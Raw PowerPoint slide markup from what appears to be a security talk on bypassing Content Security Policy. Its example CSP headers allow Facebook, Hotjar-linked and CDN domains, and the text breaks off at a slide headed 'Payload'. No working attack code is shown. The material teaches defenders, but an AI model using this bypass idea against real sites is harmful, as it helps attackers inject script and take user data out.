                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84CE4BA3-62E6-E935-9C39-42ED938788FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4632198" y="990176"/>
            <a:ext cx="438150" cy="635006"/>
            <a:chOff x="4623054" y="926939"/>
            <a:chExt cx="438150" cy="635006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8118FDE-E8FB-2785-76F3-8F6F7E2F9AC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4623054" y="1361322"/>
              <a:ext cx="438150" cy="20062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9" name="Straight Arrow Connector 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4687E3B-F78B-0CE2-85A6-CF96D5EB6855}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="3" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4842129" y="926939"/>
              <a:ext cx="0" cy="434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61F8638-A5E5-6333-1A61-31DC6B3F7D8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4949634" y="5099280"/>
            <a:ext cx="2292725" cy="1060682"/>
            <a:chOff x="4949633" y="5047276"/>
            <a:chExt cx="2292725" cy="1060682"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77F7C2F8-BE43-016E-6B89-CF04F995AE8B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4949633" y="5738626"/>
              <a:ext cx="2292725" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:hlinkClick r:id="rId3"/>
                </a:rPr>
                <a:t>https://bit.ly/hotjar2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0"/>
                <a:t> </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Arrow: Down 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E025250E-3F61-23B3-EA53-BCCD3BC70FF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5886445" y="5047276"/>
              <a:ext cx="419100" cy="627650"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FF7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111121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1</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Hotjar</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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Profit 💸</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530962" y="266596"/>
            <a:ext cx="7468721" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1500" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDC381A1-CA80-22C6-C251-B5372B2C0095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4626457" y="866647"/>
            <a:ext cx="7277731" cy="5357324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2501987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2161DE-7263-292A-B589-BD5778E61D45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="15087" t="13693" r="19081" b="44704"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591569" y="1333499"/>
            <a:ext cx="9008861" cy="4191001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327054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tjar1-sq-sa">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{022BCEDC-7D85-662E-5E55-467340B92692}"/>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86027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873" objId="8"/>
        <p14:stopEvt time="49559" objId="8"/>
      </p14:showEvt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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What is CSP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{761739C8-A8F0-52DB-59B2-27A8909B2264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="5400" i="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[…] is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BABA9BE-8D19-7B85-040B-4C20F12E84E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6297990"/>
            <a:ext cx="7950200" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="160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778192604"/>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2</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Facebook</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3746EE3E-7FDF-2FA5-2B58-387A1B120A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87277950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097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2</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Facebook</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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Security-Policy</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535781" y="928315"/>
            <a:ext cx="7171048" cy="5001369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*.facebook.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'nonce-3FahAWXnLOYTy8KNO3V6Fsmd' 'unsafe-eval' *.jsdelivr.net *.facebook.net code.jquery.com;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>font-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self' data: ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * data:; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>style-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self' data: cdn.jsdelivr.net 'unsafe-inline’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>base-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'none'; object-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'none';</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2900" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2026632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2</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Facebook</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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Security-Policy</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535781" y="705177"/>
            <a:ext cx="7171048" cy="5447645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>connect-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*.facebook.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E8EAED"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'nonce-3FahAWXnLOYTy8KNO3V6Fsmd' 'unsafe-eval' *.jsdelivr.net *.facebook.net code.jquery.com;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>font-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self' data: ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * data:; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>style-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'self' data: cdn.jsdelivr.net 'unsafe-inline’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>base-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'none'; object-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'none';</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2900" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250071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2</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Facebook</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Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
